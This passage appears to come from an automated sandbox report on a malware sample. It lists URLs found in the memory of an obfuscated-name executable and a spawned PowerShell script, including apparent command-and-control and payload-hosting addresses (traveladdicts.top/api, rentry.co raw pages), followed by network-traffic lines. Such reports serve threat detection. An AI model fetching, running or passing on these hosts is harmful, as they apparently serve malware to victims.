              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeString found in binary or memory: http://www.testlab2008.com/indices/submit.php?c=CD&i=
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885656687.000000000378A000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: powershell.exe, 00000004.00000002.2480645091.00000000047E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBkq
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2147066813.0000000003756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2147066813.0000000003756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885656687.000000000378A000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885656687.000000000378A000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885656687.000000000378A000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2147066813.0000000003756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2147066813.0000000003756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2147066813.0000000003756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2469696699.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470709109.0000000000745000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475854244.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2478360512.0000000003761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, MVYET7Q4Z4FMOQW2PUNL.ps1.0.drString found in binary or memory: https://rentry.co/
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2478360512.0000000003761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/d
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.000000000075A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.000000000074F000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2478360512.0000000003761000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475812271.0000000000750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/feouewe5/raw
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2478360512.0000000003761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/feouewe5/rawp
              Source: powershell.exe, 00000004.00000002.2480645091.0000000004B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/hZ#l
              Source: powershell.exe, 00000004.00000002.2480645091.0000000004B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/static/icons/270.pnLRkqR
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2469696699.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470709109.0000000000745000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475854244.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.0000000000753000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, MVYET7Q4Z4FMOQW2PUNL.ps1.0.drString found in binary or memory: https://rentry.co/static/icons/270.png
              Source: powershell.exe, 00000004.00000002.2480645091.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/static/icons/270.pnghZ#lL1
              Source: powershell.exe, 00000004.00000002.2480645091.0000000004B49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/static/icons/270.pnghZ#lx
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2469696699.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470709109.0000000000745000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475854244.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.0000000000753000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, MVYET7Q4Z4FMOQW2PUNL.ps1.0.drString found in binary or memory: https://rentry.co/static/icons/512.png
              Source: powershell.exe, 00000004.00000002.2480645091.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/static/icons/512.pnghZ#l
              Source: powershell.exe, 00000004.00000002.2480645091.0000000004B49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/static/icons/512.pnghZ#lXN
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeString found in binary or memory: https://sectigo.com/CPS0
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1889627920.00000000037E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2146594813.0000000003A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2146594813.0000000003A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2017467015.0000000003797000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1889627920.00000000037E3000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2017698604.0000000003797000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1889972418.0000000003797000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2017873919.0000000003797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1889972418.0000000003772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2017467015.0000000003797000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1889627920.00000000037E3000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2017698604.0000000003797000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1889972418.0000000003797000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2017873919.0000000003797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1889972418.0000000003772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1873015266.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475854244.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2315999928.0000000000754000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2309256685.0000000003741000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2451218517.0000000000754000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2276511844.0000000000754000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2304592052.0000000000754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2304592052.0000000000754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/#
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475854244.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.0000000000753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/3
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1873015266.00000000006ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/4
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2276511844.0000000000754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/K
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1873015266.00000000006ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/L
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1873015266.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.000000000075A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.000000000074F000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2472691393.0000000000670000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2017828985.0000000000755000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2315999928.000000000074F000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475812271.0000000000750000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2451218517.000000000074B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/api
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2451218517.000000000075A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2315999928.000000000075A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/api9
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2277383833.000000000075A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2304592052.000000000075A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.000000000075A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475854244.000000000075A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2451218517.000000000075A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2276511844.0000000000754000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2315999928.000000000075A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/api:
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2451218517.000000000075A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2315999928.000000000075A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/apiC
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475854244.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.0000000000753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/c
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1873015266.00000000006ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/sd
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2147066813.0000000003756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885656687.000000000378A000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2147066813.0000000003756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885656687.000000000378A000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: powershell.exe, 00000004.00000002.2480645091.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, MVYET7Q4Z4FMOQW2PUNL.ps1.0.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-LLFSDKZXET
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2146594813.0000000003A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2146594813.0000000003A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2146594813.0000000003A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2146594813.0000000003A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2146594813.0000000003A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
